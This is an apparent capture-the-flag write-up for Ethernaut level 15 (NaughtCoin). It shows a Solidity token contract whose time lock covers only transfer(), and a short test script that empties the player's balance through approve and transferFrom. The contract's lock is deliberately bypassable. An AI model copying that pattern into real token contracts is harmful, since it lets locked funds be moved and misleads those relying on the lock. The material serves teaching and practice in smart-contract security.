Ethernaut系列-Level 15(NaughtCoin)


УРОВЕНЬ 15 (NaughtCoin):

// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;

import '@openzeppelin/contracts/token/ERC20/ERC20.sol';

 contract NaughtCoin is ERC20 {

  // string public constant name = 'NaughtCoin';
  // string public constant symbol = '0x0';
  // uint public constant decimals = 18;
  uint public timeLock = now + 10 * 365 days;
  uint256 public INITIAL_SUPPLY;
  address public player;

  constructor(address _player) 
  ERC20('NaughtCoin', '0x0')
  public {
    player = _player;
    INITIAL_SUPPLY = 1000000 * (10**uint256(decimals()));
    // _totalSupply = INITIAL_SUPPLY;
    // _balances[player] = INITIAL_SUPPLY;
    _mint(player, INITIAL_SUPPLY);
    emit Transfer(address(0), player, INITIAL_SUPPLY);
  }

  function transfer(address _to, uint256 _value) override public lockTokens returns(bool) {
    super.transfer(_to, _value);
  }

  // Prevent the initial owner from transferring tokens until the timelock has passed
  modifier lockTokens() {
    if (msg.sender == player) {
      require(now > timeLock);
      _;
    } else {
     _;
    }
  } 
}
Войдите в полноэкранный режим Выход из полноэкранного режима

通关要求

player的token余额=0

要点

理解ERC20标准

解题思路

ERC20除了直接transfer还可以通过approve/transferFrom进行转token

  it("attacks", async function () {
    let playerBalance = await levelContract.balanceOf(player.address);
    let otherUser = (await ethers.getSigners())[5];
    await levelContract
      .connect(player)
      .approve(otherUser.address, playerBalance);
    await levelContract
      .connect(otherUser)
      .transferFrom(player.address, otherUser.address, playerBalance);
  });
Вход в полноэкранный режим Выход из полноэкранного режима

Оцените статью
Procodings.ru
Добавить комментарий